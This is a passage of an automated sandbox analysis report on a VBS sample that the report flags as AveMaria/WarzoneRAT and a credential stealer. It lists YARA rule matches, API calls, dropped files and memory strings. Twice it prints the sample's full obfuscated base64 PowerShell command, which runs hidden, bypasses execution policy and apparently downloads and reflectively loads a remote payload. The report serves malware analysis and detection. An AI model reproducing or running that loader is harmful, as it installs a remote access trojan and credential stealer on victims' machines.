              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,5_2_0040EDA9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEE0EF24_2_00007FF7BFEE0EF2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEF0E5D4_2_00007FF7BFEF0E5D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFFB06444_2_00007FF7BFFB0644
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004132795_2_00413279
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041DEAA5_2_0041DEAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC927705_2_6CC92770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCAB7825_2_6CCAB782
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC80DCD5_2_6CC80DCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD1AE575_2_6CD1AE57
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD1CB805_2_6CD1CB80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD1CB6B5_2_6CD1CB6B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCF8B205_2_6CCF8B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCE65E45_2_6CCE65E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC726E55_2_6CC726E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCB668F5_2_6CCB668F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCAA67B5_2_6CCAA67B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCE07C95_2_6CCE07C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCC628B5_2_6CCC628B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCD22745_2_6CCD2274
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCD23AC5_2_6CCD23AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC6DC7E5_2_6CC6DC7E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CC9FFE35_2_6CC9FFE3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004036F7 appears 59 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00411E88 appears 49 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 6CCC78D9 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 6CCA1B0E appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 6CC96BFC appears 79 times
              Source: 89SkYNNpdi.vbsInitial sample: Strings found which are bigger than 50
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 4.2.powershell.exe.1b2b2de3860.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@8/15@2/3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCCCBCD MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,5_2_6CCCCBCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_00410B38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,5_2_0041405F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,5_2_004148B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,5_2_00415169
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0040D33C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcyy4yc3.52n.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
